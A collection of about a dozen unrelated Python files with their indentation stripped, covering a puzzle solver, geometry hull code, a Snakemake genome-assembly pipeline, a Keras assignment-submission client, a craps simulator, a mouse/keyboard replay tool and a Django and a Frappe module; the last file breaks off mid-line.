busses = [(x[0], int(x[1])) for x in enumerate(open('data/13.txt').read().split('\n')[1].split(',')) if x[1] != 'x']
t = 0
stepsize = 1
print(busses)
for departure, bus in busses:
while t % bus != (bus - departure) % bus:
t += stepsize
stepsize *= bus
print(t)
|
"""
THE FOLLOWING CODE IS ADAPTED FROM HERE:
http://blog.thehumangeo.com/2014/05/12/drawing-boundaries-in-python/
"""
#-------------------------------- IMPORTS -----------------------------------
from shapely.ops import cascaded_union, polygonize
from scipy.spatial import Delaunay
import numpy as np
import shapely.geometry as geometry
#------------------------ FUNCTION DEFINITIONS ------------------------------
def alpha_shape(points, alpha):
"""
Compute the alpha shape (concave hull) of a set of 2D points.
Parameters:
----------
points: Iterable container of shapely points.
alpha: alpha value that characterizes the border. Small alpha means
only really long edges get pruned. Large alpha means lots of edges
get pruned, even short ones.
Returns:
-------
concave_hull: The concave hull of 'points', for the given value of alpha.
It's a shapely polygon or polygon collection.
edge_points: The vertices that make up concave_hull.
"""
if len(points) <= 3:
# If only 3 points or fewer, can't really perform any of these
# operations in any interesting way.
return geometry.MultiPoint(list(points)).convex_hull
def add_edge(edges, edge_points, coords, i, j):
"""
Add a line between the i-th and j-th points,
if not in the list already
"""
if (i, j) in edges or (j, i) in edges:
# already added
return
edges.add( (i, j) )
edge_points.append(coords[ [i, j] ])
# Get Delaunay triangulation of points
coords = np.array([point.coords[0] for point in points])
tri = Delaunay(coords)
# initialize edges and edge_points
edges = set()
edge_points = []
# loop over the triangles in the Delaunay triangulation.
# ia, ib, ic are indices of vertices of a given triangle
# pa, pb, pc are coordinates of vertices
for ia, ib, ic in tri.vertices:
pa = coords[ia]
pb = coords[ib]
pc = coords[ic]
# Lengths of edges
a = ((pa[0]-pb[0])**2 + (pa[1]-pb[1])**2)**0.5
b = ((pb[0]-pc[0])**2 + (pb[1]-pc[1])**2)**0.5
c = ((pc[0]-pa[0])**2 + (pc[1]-pa[1])**2)**0.5
# Semiperimeter of triangle
s = (a + b + c)/2.0
# Area of triangle by Heron's formula
area = (s*(s-a)*(s-b)*(s-c))**0.5
# Here's the radius filter.
circum_r = a*b*c/(4.0*area)
if circum_r < 1.0/alpha:
add_edge(edges, edge_points, coords, ia, ib)
add_edge(edges, edge_points, coords, ib, ic)
add_edge(edges, edge_points, coords, ic, ia)
m = geometry.MultiLineString(edge_points)
triangles = list(polygonize(m))
concave_hull = cascaded_union(triangles)
return concave_hull, edge_points
|
## ucdbioinfo_supernova_pipeline
## runs the process_10xReads.py script from the proc10xG repo
## https://github.com/ucdavis-bioinformatics/proc10xG
## Assumes only a single pair of fastq (R1/R2) files under the fastqs folder
import os
import json
args = {}
sbatch_args = {}
#TODO take this in from the CLI argument
# TODO -t threads?? MEM PER NODE
configfile: "templates/keith.json"
###########################################################################
# CHECK IF SRUN OR SBATCH
###########################################################################
if config["__default__"]["running_locally"]=="True":
# print ("Running Locally")
args["running_locally"] = True
else:
print ("Running on cluster")
#print ("My SLURM_JOB_ID: %s" %(os.environ['SLURM_JOB_ID']))
#args['cluster_threads'] = os.environ['SLURM_NTASKS']
#print ("My SLURM_JOB_ID: %s" %(os.environ['SLURM_JOB_ID']))
###########################################################################
# CORE SETUP
###########################################################################
args['pipeline'] = config['pipeline']['basepath']
args['basename'] = config['project']['basename']
args['id'] = config['project']['id']
args['fastqs'] = args['basename'] + '/' + config['project']['fastqs']
files = os.listdir(args['fastqs'])
# ILLUMINA 10X
for file in files:
if "R1_001.fastq.gz" in file:
args['fastq1'] = args['fastqs'] + '/' + file
if "R2_001.fastq.gz" in file:
args['fastq2'] = args['fastqs'] + '/' + file
###########################################################################
# PARAMETERS
###########################################################################
# PROC10XG
args['proc10xg_out'] = args['basename'] + '/01-%s-%s_reads' % (args['id'], 'proc10xG')
args['proc10xg_outprefix'] = args['proc10xg_out'] + '/%s-%s' % (args['id'], 'proc10xG_reads')
args['fastq1_proc10xg_out'] = args['proc10xg_outprefix'] + '_R1_001.fastq.gz'
args['fastq2_proc10xg_out'] = args['proc10xg_outprefix'] + '_R2_001.fastq.gz'
args['log_out'] = args['proc10xg_outprefix'] + '.log'
args['proc10xPath'] = args['pipeline'] + '/%s' % ('proc10xG')
# KAT READS
args['kat_reads_out'] = args['basename'] + '/02-%s-%s' % (args['id'], 'kat_reads')
args['kat_reads_outprefix'] = args['kat_reads_out'] + '/%s-%s' % (args['id'], 'kat_reads')
args['kmers'] = config['kat_reads']['kmers']
# RUN SUPERNOVA
args['supernova_out'] = args['basename'] + '/01-%s-%s' % (args['id'], 'supernova_run')
args['supernova_id'] = '01-%s-%s' % (args['id'], 'supernova_run')
args['supernova_read_count'] = config["supernova"]["read_count"]
args['supernova_out_dir'] = args['supernova_out'] + '/' + 'outs'
args['supernova_seqout'] = args['basename'] + '/02-%s-%s' %(args['id'], 'supernova_outs')
args['supernova_out_prefix'] = args['supernova_seqout'] + '/%s-%s' %(args['id'], 'supernova_mkout')
# MKBWA
args['supernova_seqin1'] = args['supernova_seqout'] + '/%s-supernova_mkout-pseudohap2.1.fasta.gz' % args['id']
args['supernova_seqin2'] = args['supernova_seqout'] + '/%s-supernova_mkout-pseudohap2.2.fasta.gz' % args['id']
# KAT COMP and SECT
args['kat_compsect_out'] = args['basename'] + '/03-%s-%s' % (args['id'], 'assembly_eval')
args['kat_comp1'] = args['kat_compsect_out'] + '/%s-kat_eval-h1_vs_pe' % args['id']
args['kat_comp2'] = args['kat_compsect_out'] + '/%s-kat_eval-all_vs_pe' % args['id']
args['kat_sect'] = args['kat_compsect_out'] + '/%s-kat_eval-sect-h1_vs_pe' % args['id']
# MAP BARCODES
args['assembly_eval_outprefix'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam'
args['assembly_eval_flagstat'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam.flagstat'
args['assembly_eval_idxstats'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam.idxstats'
args['assembly_eval_stats'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam.stats'
###########################################################################
# MODULE LOADS and SBATCH SETUP
###########################################################################
if args['running_locally']=="False":
import socket
print("Running Locally")
print (socket.gethostname())
for sbatch in ['kat_reads_sbatch', 'mkoutput_supernova_sbatch', 'mkbwaref_sbatch', 'kat_comp1_sbatch',
'kat_comp2_sbatch', 'kat_sect_sbatch', 'map_barcodes_sbatch']:
args[sbatch] = "sbatch -J %s -N %s -p %s -t %s -n %s -m %s --output %s --error %s --mail-type %s --mail-user %s" \
% (config[sbatch]['job-name'], config[sbatch]['n'], config[sbatch]['partition'],
config[sbatch]['time'], config[sbatch]['ntasks'], config[sbatch]['mem'],
config[sbatch]['output'], config[sbatch]['error'], config[sbatch]['mail-type'],
config[sbatch]['mail-user'],)
shell.prefix("set -o pipefail; ")
shell.prefix("module load kat; module load anaconda2; module load bwa/0.7.16a; module load samtools/1.9; module load supernova/2.1.1;")
shell("module list")
print(json.dumps(args, indent=1))
###########################################################################
# SBATCH SETUP
###########################################################################
# args['cluster_time'] = config['kat_reads_sbatch']['main']['time']
# args['cluster_account'] = config['kat_reads_sbatch']['main']['account']
# args['cluster_partition'] = config['kat_reads_sbatch']['main']['partition']
# args['cluster_nodes'] = config['kat_reads_sbatch']['main']['n']
###########################################################################
# RULES
###########################################################################
rule kat_sect:
input:
seqin_1 = args['supernova_seqin1'],
proc10xin_1 = args['fastq1_proc10xg_out'],
proc10xin_2 = args['fastq2_proc10xg_out']
output:
kat_comp1_out = args['kat_sect']
run:
# TODO check raw command
arg_list = config['kat_sect_sbatch']['ntasks'], args['kat_comp1'], args['supernova_seqin1'], \
str(args['proc10xPath']) + '/filter_10xReads.py', args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out']
command = "kat sect -t%s -H10000000000 -o %s <( gunzip -c %s) <( %s -1 %s -2 %s ) " % arg_list
if args['running_locally']:
command = command
else:
command = args['kat_sect_sbatch'] + "--wrap=" + "'" + command + "'"
print(command)
shell(command)
rule kat_comp2:
input:
seqin_1 = args['supernova_seqin1'],
proc10xin_1 = args['fastq1_proc10xg_out'],
proc10xin_2 = args['fastq2_proc10xg_out']
output:
kat_comp1_out = args['kat_comp2']
run:
# TODO check raw command
arg_list = config['kat_comp2_sbatch']['ntasks'], args['kat_comp2'], str(args['proc10xPath']) + '/filter_10xReads.py', \
args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out'], args['supernova_seqin1'], args['supernova_seqin2']
command = "kat comp -t%s -I10000000000 -H10000000000 -o %s <( %s -1 %s -2 %s ) <( gunzip -c %s %s)" % arg_list
if args['running_locally']:
command = command
else:
command = args['kat_comp2_sbatch'] + "--wrap=" + "'" + command + "'"
print(command)
shell(command)
rule kat_comp1:
input:
seqin_1 = args['supernova_seqin1'],
proc10xin_1 = args['fastq1_proc10xg_out'],
proc10xin_2 = args['fastq2_proc10xg_out']
output:
kat_comp1_out = args['kat_comp1']
run:
# TODO check raw command
arg_list = config['kat_comp1_sbatch']['ntasks'], args['kat_comp1'], str(args['proc10xPath']) + '/filter_10xReads.py', \
args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out'], args['supernova_seqin1']
command = "kat comp -t%s -I10000000000 -H10000000000 -o %s <( %s -1 %s -2 %s ) <( gunzip -c %s)" % arg_list
if args['running_locally']:
command = command
else:
command = args['kat_comp1_sbatch'] + "--wrap=" + "'" + command + "'"
print(command)
shell(command)
rule map_barcodes:
input:
seqin_1 = args['supernova_seqin1'],
proc10xin_1 = args['fastq1_proc10xg_out'],
proc10xin_2 = args['fastq2_proc10xg_out']
output:
bam_out = args['assembly_eval_outprefix'],
bam_flagstat = args['assembly_eval_flagstat'],
bam_idxstats = args['assembly_eval_idxstats'],
bam_stats = args['assembly_eval_stats']
run:
# TODO check raw commands
THREADS = config['map_barcodes_sbatch']['ntasks']
MAPTHREADS = THREADS-6
SORTTHREADS = THREADS-MAPTHREADS
arg_list = MAPTHREADS, args['id'], args['id'], args['supernova_seqin1'], args['fastq1_proc10xg_out'], \
args['fastq2_proc10xg_out'], str(args['proc10xPath']) + '/samConcat2Tag.py', SORTTHREADS, args['assembly_eval_outprefix']
command_bwa = "bwa mem -t %s -C -R '@RG\tID:%s\tSM:%s\tPL:ILLUMINA\tDS:Paired' %s %s %s | python %s | samtools sort -m 768M --threads %s | samtools view -hb -o %s -" % arg_list
command_index = "samtools index -@ %s %s" %(str(THREADS), args['assembly_eval_outprefix'])
command_flagstat = "samtools flagstat -@ %s %s > %st" %(str(THREADS), args['assembly_eval_outprefix'], args['assembly_eval_flagstat'])
command_view = "samtools view -b -q 30 -f 0x2 -F 0x904 %s | samtools idxstats - > %s" %(args['assembly_eval_outprefix'], args['assembly_eval_idxstats'])
command_stats = "samtools stats -@ %s %s > %s" %(str(THREADS), args['assembly_eval_outprefix'], args['assembly_eval_stats'])
master_list = [command_bwa, command_index, command_flagstat, command_view, command_stats]
if args['running_locally']:
command = master_list.join(';')
else:
command = args['map_barcodes_sbatch'] + "--wrap=" + "'" + master_list.join(';') + "'"
print(command)
shell(command)
rule kat_reads:
input:
proc10xg_out = args['log_out'],
fastq1 = args['fastq1_proc10xg_out'],
fastq2 = args['fastq2_proc10xg_out']
params:
proc10xg_outprefix = args['proc10xg_outprefix'],
proc10xg_out = args['proc10xg_out'],
proc10xg_path = args['proc10xPath'],
kat_reads_out = args['kat_reads_out'],
kat_reads_outprefix = args['kat_reads_outprefix'],
log_out = args['log_out'],
kmers = args['kmers'],
outputs = expand(args['kat_reads_outprefix'] + '-' + '{kmer}', kmer = args['kmers'])
output:
kat_reads_out = args['kat_reads_out']
run:
for kmer, output in zip(params.kmers, params.outputs):
arg_list = output, kmer, config['kat_reads_sbatch']['ntasks'], params.proc10xg_path, args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out']
command = "kat hist -o %s -m %s -t %s <(%s -1 %s -2 %s)" % arg_list
if args['running_locally']:
command = command
else:
args['kat_reads_sbatch'] = args['kat_reads_sbatch'].\
replace(".err", str(kmer) + ".err").replace(".out", str(kmer) + ".out")
command = args['kat_reads_sbatch'] + "--wrap=" + "'" + command + "'"
print(command)
shell(command)
rule proc10xG:
input:
fastq1 = args['fastq1'],
fastq2 = args['fastq2']
params:
proc10xg_outprefix = args['proc10xg_outprefix'],
proc10xg_out = args['proc10xg_out'],
proc10xg_path = args['proc10xPath'],
log_out = args['log_out']
output:
#log_out = args['log_out'],
out_dir = args['proc10xg_out'],
fastq1_out = args['fastq1_proc10xg_out'],
fastq2_out = args['fastq2_proc10xg_out']
run:
arg_list = args['proc10xPath'], args['fastq1'], args['fastq2'], args['proc10xg_outprefix'], args['log_out']
command = "`python %s/process_10xReads.py -1 %s -2 %s -o %s -a 2> %s`" % arg_list
print(command)
shell(command)
rule mkbwaref:
input:
bwa_seq = args['supernova_seqin1']
output:
bwa_out = str(args['supernova_seqin1']) + '.bwt'
run:
command = "bwa index %s" % args['supernova_seqin1']
if args['running_locally']:
command = command
else:
command = args['mkbwaref_sbatch'] + "--wrap=" + "'" + command + "'"
print(command)
shell(command)
rule mkoutput_supernova:
input:
in_dir = args['supernova_out_dir']
output:
seqout = args['supernova_seqout'],
bwa_seq = args['supernova_seqin1']
run:
for outstyle, minsize in zip(config['supernova']['outstyle'], config['supernova']['minsize']):
arg_list = input.in_dir, args['supernova_out_prefix'] + '-' + outstyle, outstyle, minsize
command = "supernova mkoutput --asmdir=%s/assembly --outprefix=%s --style=%s --minsize=%s --headers=full" % arg_list
if args['running_locally']:
command = command
else:
args['"mkoutput_supernova_sbatch'] = args['"mkoutput_supernova_sbatch'].\
replace(".err", outstyle + ".err").replace(".out", outstyle + ".out")
command = args['"mkoutput_supernova_sbatch'] + "--wrap=" + "'" + command + "'"
print(command)
shell(command)
rule run_supernova:
input:
fastq1 = args['fastq1'],
fastq2 = args['fastq2']
params:
supernova_out = args['supernova_out'],
read_count = args['supernova_read_count'],
fastqs = args['fastqs']
output:
out_dir = args['supernova_out_dir']
run:
#TODO check local cores and nproc, MRO_DISK_SPACE_CHECK=disable
arg_list = args['supernova_id'], args['supernova_read_count'], args['fastqs'], 48
command = "supernova run --id=%s --maxreads=%s --fastqs=%s --localcores=%s" % arg_list
print(command)
shell(command)
rule Illumina_10x:
output:
fastq1 = args['fastq1'],
fastq2 = args['fastq2']
rule all:
input:
rules.kat_reads.output,
rules.proc10xG.output,
rules.run_supernova.output,
rules.mkoutput_supernova.output,
rules.kat_comp1.output,
rules.kat_comp2.output,
rules.kat_sect.output,
rules.mkbwaref.output,
rules.map_barcodes.output,
rule right_side:
input:
rules.proc10xG.output,
rules.kat_reads.output
rule left_side:
input:
rules.run_supernova.output,
rules.mkoutput_supernova.output
rule bottom:
input:
rules.kat_comp1.output,
rules.kat_comp2.output,
rules.kat_sect.output,
rules.mkbwaref.output,
rules.map_barcodes.output
|
"""
This file declares all the valid routes for Dash app URL routing
"""
HOME_ROUTE = "/"
GRAPHS_PAGE_ROUTE = "/graphs"
|
from importa_e_trata_txts import abre_documento, imprime_planilha
import re
''' Algorítmo usado para a main temporária de códigos reutilizáveis '''
lista_titulos_links = []
corpo_documento = abre_documento('links.txt')
linhas_documentos = re.findall(r'^([A-Z](?:\S{1,}|\s{1,2})+?)\n*(http(?:\S{1,}|\n)+)\n', corpo_documento, flags=re.MULTILINE)
linhas_documentos_lista = []
for tupla in linhas_documentos:
linha = list(tupla)
linhas_documentos_lista.append(linha)
print(linhas_documentos_lista)
imprime_planilha(linhas_documentos_lista, ['Referências', 'Links'])
|
import json
import logging
import typing
from typing import TYPE_CHECKING
import numpy as np
import progressbar
import requests
from kerasltisubmission import loader
from kerasltisubmission.exceptions import (
KerasLTISubmissionBadResponseException,
KerasLTISubmissionConnectionFailedException,
KerasLTISubmissionException,
KerasLTISubmissionInputException,
KerasLTISubmissionInvalidSubmissionException,
KerasLTISubmissionNoInputException,
)
if TYPE_CHECKING: # pragma: no cover
from kerasltisubmission import Submission # noqa: F401
from kerasltisubmission.kerasltisubmission import ModelType # noqa: F401
log = logging.getLogger("kerasltisubmission")
log.addHandler(logging.NullHandler())
AnyIDType = typing.Union[str, int]
SingleInputType = typing.Dict[str, typing.Any]
InputsType = typing.List[SingleInputType]
PredictionsType = typing.Dict[str, typing.Any]
class LTIProvider:
def __init__(
self,
input_api_endpoint: str,
submission_api_endpoint: str,
user_token: AnyIDType,
) -> None:
self.user_token = user_token
self.input_api_endpoint = input_api_endpoint
self.submission_api_endpoint = submission_api_endpoint
def get_validation_set_size(self, assignment_id: AnyIDType) -> typing.Optional[int]:
try:
r = requests.get(
f"{self.input_api_endpoint}/assignment/{assignment_id}/size"
)
rr = r.json()
except Exception as e:
raise KerasLTISubmissionConnectionFailedException(
self.input_api_endpoint, e
) from None
validation_set_size = None
if r.status_code == 200:
try:
validation_set_size = int(rr.get("size"))
except ValueError:
pass
return validation_set_size
def guess(
self, assignment_id: AnyIDType, predictions: PredictionsType
) -> typing.Tuple[float, float]:
log.debug(
f"Submitting {len(predictions)} predictions to the provider for grading"
)
headers = {"content-type": "application/json"}
if not len(predictions) > 0:
raise KerasLTISubmissionInvalidSubmissionException(predictions)
try:
r = requests.post(
self.submission_api_endpoint,
data=json.dumps(
dict(
predictions=predictions,
user_token=self.user_token,
assignment_id=assignment_id,
)
),
headers=headers,
)
rr = r.json()
except Exception as e:
log.error(e)
raise KerasLTISubmissionConnectionFailedException(
self.submission_api_endpoint, e
) from None
try:
assert r.status_code == 200 and rr.get("error") is None
log.debug(
f"Sent {len(predictions)} predictions to the provider for grading"
)
log.info(f"Successfully submitted assignment {assignment_id} for grading")
return (
round(rr.get("accuracy"), ndigits=2),
round(rr.get("grade"), ndigits=2),
)
except (AssertionError, KeyError, ValueError, TypeError):
raise KerasLTISubmissionBadResponseException(
api_endpoint=self.submission_api_endpoint,
return_code=r.status_code,
assignment_id=assignment_id,
message=rr.get("error"),
)
@classmethod
def perform_reshape(
cls,
model: "ModelType",
input_matrix: np.ndarray,
reshape: typing.Optional[bool] = True,
) -> np.ndarray:
input_shape = input_matrix.shape
expected_input_shape = (None, *input_shape[1:])
if model.input_shape != expected_input_shape:
output_shape_mismatch = f"Input shape mismatch: Got {model.input_shape} but expected {expected_input_shape}"
if reshape is not True:
raise KerasLTISubmissionInputException(output_shape_mismatch)
# Try to reshape
log.warning(output_shape_mismatch)
return input_matrix.reshape(cls.safe_shape(model.input_shape))
@classmethod
def safe_shape(
cls, shape: typing.Tuple[typing.Optional[typing.Any], ...]
) -> typing.Tuple[int, ...]:
escaped = []
for dim in shape:
escaped.append(-1 if not dim else dim)
return tuple(escaped)
def submit(
self,
s: typing.Union["Submission", typing.List["Submission"]],
verbose: bool = True,
strict: bool = False,
reshape: bool = False,
expected_output_shape: typing.Optional[
typing.Tuple[typing.Optional[typing.Any], ...]
] = None,
) -> typing.Dict[str, typing.Dict[str, float]]:
results = dict()
if isinstance(s, list):
submissions = s
else:
submissions = [s]
for sub in submissions:
if (
strict
and expected_output_shape
and not sub.model.output_shape == expected_output_shape
):
raise KerasLTISubmissionInputException(
f"Model has invalid output shape: Got {sub.model.output_shape} but expected {expected_output_shape}"
)
# Get assignment inputs and propagate errors
validation_set_size = self.get_validation_set_size(sub.assignment_id)
assignment_loader = loader.PartialLoader(
sub.assignment_id, self.input_api_endpoint
)
if assignment_loader.is_empty():
raise KerasLTISubmissionNoInputException(
self.input_api_endpoint, sub.assignment_id
)
predictions: PredictionsType = dict()
if not verbose or validation_set_size is None:
# Collect all input matrices
collected: "InputsType" = []
while True:
if (
validation_set_size is not None
and len(collected) >= validation_set_size
):
break
loaded_input = assignment_loader.load_next()
if loaded_input is None:
break
collected.append(loaded_input)
net_out = sub.model.predict(
np.array([np.asarray(c.get("matrix")) for c in collected])
)
predictions = {
str(c.get("hash")): int(np.argmax(pred))
for c, pred in zip(collected, net_out)
}
else:
errors: typing.List[Exception] = []
for i in progressbar.progressbar(
range(validation_set_size), redirect_stdout=True
):
loaded_input = assignment_loader.load_next()
if loaded_input is None:
raise KerasLTISubmissionInputException(f"Missing input {i}")
try:
input_matrix = loaded_input.get("matrix")
input_hash = loaded_input.get("hash")
probabilities = sub.model.predict(
np.expand_dims(np.asarray(input_matrix), axis=0)
)
prediction = np.argmax(probabilities)
if input_hash:
predictions[input_hash] = int(prediction)
except Exception as e:
raise e
if e not in errors:
errors.append(e)
if len(errors) > 0:
raise KerasLTISubmissionException()
accuracy, grade = self.guess(sub.assignment_id, predictions)
results[str(sub.assignment_id)] = dict(accuracy=accuracy, grade=grade)
return results
|
#!/usr/bin/env python
from array import *
import random
class Cell():
def __init__(self,f,g,h,x=0,y=0,label=""):
self.x=x
self.y=y
self.f=f
self.g=g
self.h=h
self.label = label
def __str__(self):
return "[%d,%d], f: %d, g: %d, h: %d, label: %s" % \
(self.x, self.y, self.f, self.g, self.h, self.label)
class Grid():
def __init__(self,col,row,init=0):
self.col = col
self.row = row
self.init = init
self.matrix = [[Cell(0,0,0,y,x) for x in range(row)] for y in range(col)]
def setlabel(self,x,y,label):
print(F"Setting [{x},{y}] label {label}")
self.matrix[x][y].label = label
print(F"Cell: {self.matrix[x][y]}")
def print(self):
print(F"Dim: {self.col}, {self.row}")
for i in range(0,self.col):
row_str=""
for j in range(0,self.row):
cell = self.matrix[i][j]
label = str(cell.label)
if label != "":
row_str += "|" + label
else:
val = cell.g + cell.h
row_str += "|" + str(val)
if j == r-1:
row_str += "|"
print(F"{row_str}")
if __name__ == '__main__':
print("Hello")
# initialize a 2D array
c,r = 10,10
grid = Grid(c,r)
grid.print()
obsticals = random.randint(5,9)
for i in range(0,obsticals):
grid.setlabel(random.randint(0,9),random.randint(0,9),"#")
grid.setlabel(0,3,"S")
grid.setlabel(9,7,"E")
grid.print()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('query', '0013_term'),
]
operations = [
migrations.AlterModelOptions(
name='query',
options={'permissions': (('download_many_documents', 'Can download larger numbers of results'),)},
),
]
|
# -*- encoding: utf-8 -*-
from home import *
|
import math
import sys
import statistics
from crapsGame import CrapsGame
from math import log10, floor
money = int(sys.argv[1])
iterations = int(sys.argv[2])
debug = bool(sys.argv[3] == 'True')
if (debug == True):
returns = [money*1.5]
minimums = [10]
else:
#returns = [int(money * 1.2), int(money * 1.5), int(money * 1.7), money * 2]
returns = [int(money * 1.5)]
#minimums = [5, 10, 15, 25]
minimums = [5]
resultFile = open('results.txt', 'w')
lowFile = open('low.txt', 'w')
highFile = open('high.txt', 'w')
resultFile.write("Start: ${}, Iterations: {}\n\n".format(sys.argv[1], sys.argv[2]))
lowFile.write("Start: ${}, Iterations: {}\n\n".format(sys.argv[1], sys.argv[2]))
highFile.write("Start: ${}, Iterations: {}\n\n".format(sys.argv[1], sys.argv[2]))
probTemplate = "{0:^20}|{1:^20}|{2:^20}|{3:^20}|{4:^20}|{5:^20}|{6:^20}|{7:^20}"
resultTemplate = "{0:^15}|{1:^15}|{2:^15}|{3:^15}|{4:^15}"
resultFile.write(resultTemplate.format("MINIMUM", "RETURN", "SUCCESS", "AVG ROLLS", "AVG POINTS"))
lowFile.write(probTemplate.format("RETURN", "MEDIAN LOW (WIN)", "MEDIAN LOW (ALL)", "MEAN LOW (WIN)", "MEAN LOW (ALL)", "STDDEV LOW (WIN)", "STDDEV LOW (ALL)", "MIN LOW (WIN)"))
highFile.write(probTemplate.format("RETURN", "MEDIAN HIGH (LOSE)", "MEDIAN HIGH (ALL)", "MEAN HIGH (LOSE)", "MEAN HIGH (ALL)", "STDDEV HIGH (LOSE)", "STDDEV HIGH (ALL)", "MAX HIGH (LOSE)"))
resultFile.write("\n");
lowFile.write("\n");
highFile.write("\n");
resultFile.write("-------------------------------------------------------------------------------\n");
highFile.write("----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
lowFile.write("----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
for desiredReturn in returns:
for minBet in minimums:
success = 0
totalRolls = 0
totalPoints = 0
allLows = []
winLows = []
allHighs = []
loseHighs = []
for iteration in range(0, iterations):
game = CrapsGame(int(sys.argv[1]), minBet, False, False, debug)
#don't terminate until all money off table
while (game.getMoney() >= minBet and game.getAvailableMoney() < desiredReturn):
game.startRound()
#bet
if (game.isOn() == False):
game.betPass(1)
if(game.getCameLastRoll() == True and game.getNumBetsOnTable() < 3 and game.getMoney() < desiredReturn):
if (game.getLastCome() == 6 or game.getLastCome() == 8):
multiple = 3
elif (game.getLastCome() == 5 or game.getLastCome() == 9):
multiple = 2
else: #point == 4 or point == 10
multiple = 1
game.betComeOdds(game.getLastCome(), multiple)
else:
if(game.getCameLastRoll() == True):
if (game.getLastCome() == 6 or game.getLastCome() == 8):
multiple = 2
elif (game.getLastCome() == 5 or game.getLastCome() == 9):
multiple = 2
else: #point == 4 or point == 10
multiple = 2
game.betComeOdds(game.getLastCome(), multiple)
if (game.getLastRollComeOut() == True):
lastRollComeOut = False
if (game.getPoint() == 6 or game.getPoint() == 8):
multiple = 2
elif (game.getPoint() == 5 or game.getPoint() == 9):
multiple = 2
else: #point == 4 or point == 10
multiple = 2
game.betPassOdds(multiple)
if (game.getNumBetsOnTable() < 3 and game.getMoney() < desiredReturn):
game.betCome(1)
elif (game.getNumBetsOnTable() < 3 and game.getMoney() < desiredReturn):
if (game.getNumBetsOnTable() == 1):
game.betCome(1)
elif (game.sixAndEightNotTaken() == True):
game.betCome(1)
#game.betPlace(6, 1)
#game.betPlace(8, 1)
else:
game.betCome(1)
#roll
rollValue = game.roll()
#update earnings
game.updateEarnings(rollValue)
totalRolls = totalRolls + game.getNumRolls()
totalPoints = totalPoints + game.getNumPoints()
if (game.getAvailableMoney() >= desiredReturn):
winLows.insert(success, game.getLow())
success = success + 1
else:
loseHighs.insert(iteration-success, game.getHigh())
allHighs.insert(iteration, game.getHigh())
allLows.insert(iteration, game.getLow())
successRate = success/iterations * 100
roundedSuccessRate = round(successRate, -int(math.floor(math.log10(abs(successRate))) - (4)))
meanRolls = int(totalRolls/iterations)
meanPoints = int(totalPoints/iterations)
meanWinLow = int(statistics.mean(winLows))
medianWinLow = int(statistics.median(winLows))
stddevWinLow = int(statistics.stdev(winLows))
meanAllLow = int(statistics.mean(allLows))
medianAllLow = int(statistics.median(allLows))
stddevAllLow = int(statistics.stdev(allLows))
meanLoseHigh = int(statistics.mean(loseHighs))
medianLoseHigh = int(statistics.median(loseHighs))
stddevLoseHigh = int(statistics.stdev(loseHighs))
meanAllHigh = int(statistics.mean(allHighs))
medianAllHigh = int(statistics.median(allHighs))
stddevAllHigh = int(statistics.stdev(allHighs))
minLow = int(min(winLows))
maxHigh = int(max(loseHighs))
resultFile.write(resultTemplate.format("${}".format(minBet), "${}".format(desiredReturn), "{}%".format(roundedSuccessRate), "{}".format(meanRolls), "{}".format(meanPoints)));
resultFile.write("\n")
lowFile.write(probTemplate.format("${}".format(desiredReturn), "${}".format(medianWinLow), "${}".format(medianAllLow), "${}".format(meanWinLow), "${}".format(meanAllLow), "${}".format(stddevWinLow), "${}".format(stddevAllLow), "${}".format(minLow)))
lowFile.write("\n")
highFile.write(probTemplate.format("${}".format(desiredReturn), "${}".format(medianLoseHigh), "${}".format(medianAllHigh), "${}".format(meanLoseHigh), "${}".format(meanAllHigh), "${}".format(stddevLoseHigh), "${}".format(stddevAllHigh), "${}".format(maxHigh)))
highFile.write("\n")
resultFile.close()
lowFile.close()
highFile.close()
|
# player.py contains functions to assist in repeating mouse/keyboard
# events as read from a file.
# * see sample_annotated.txt for file formatting details
from pynput import mouse
from pynput import keyboard
from pynput.mouse import Button
from pynput.keyboard import Key
from time import sleep
class Player:
mouse_ctrl = mouse.Controller()
keyboard_ctrl = keyboard.Controller()
# file_to_list(filename) returns a list based on the file, filename:
# * each item is a tuple representing an input event
def file_to_list(self, filename):
file = open(filename, 'r')
lines = file.readlines()
count = 0
for line in lines:
lines[count] = lines[count].rstrip()
lines[count] = tuple(lines[count].split(" "))
count += 1
return lines
# play(filename) repeats the mouse/keyboard events occuring
# in the file, filename
def play(self, filename):
lines = Player.file_to_list(self, filename)
def move(x, y):
Player.mouse_ctrl.position = (int(x), int(y))
for line in lines:
cmd = line[0]
if cmd == 'mMove':
move(line[1], line[2])
elif cmd == 'Wait':
sleep(float(line[1]))
elif cmd == 'mPress':
move(line[1], line[2])
Player.mouse_ctrl.press(eval(line[3]))
elif cmd == 'mRelease':
move(line[1], line[2])
Player.mouse_ctrl.release(eval(line[3]))
elif cmd == 'Scroll':
move(line[1], line[2])
Player.mouse_ctrl.scroll(int(line[3]), int(line[4]))
elif cmd == 'kPress':
if len(line[1]) == 1:
Player.keyboard_ctrl.press(line[1])
else:
Player.keyboard_ctrl.press(eval(line[1]))
elif cmd == 'kRelease':
if len(line[1]) == 1:
Player.keyboard_ctrl.release(line[1])
else:
Player.keyboard_ctrl.release(eval(line[1]))
else:
raise ValueError('File has invalid formatting')
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Indictrans and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from mycfo.mycfo_utils import get_central_delivery
class TrainingSubscriptionApproval(Document):
def validate(self):
pass
def before_submit(self):
self.validate_for_central_delivery_status()
self.initiate_for_request_submission()
def validate_for_central_delivery_status(self):
if not self.central_delivery_status:
frappe.throw("Central delivery Status is mandatory to submit training request.")
def initiate_for_request_submission(self):
mapper = {"Accepted":self.accept_request, "Rejected":self.reject_request}
mapper.get(self.central_delivery_status)()
def accept_request(self):
self.request_status = "Accepted"
request_type_dict = {"Forced Training":["/templates/training_templates/assigned_training_notification.html", [ frappe.db.get_value("User", {"name":self.training_requester}, "email") ] ],
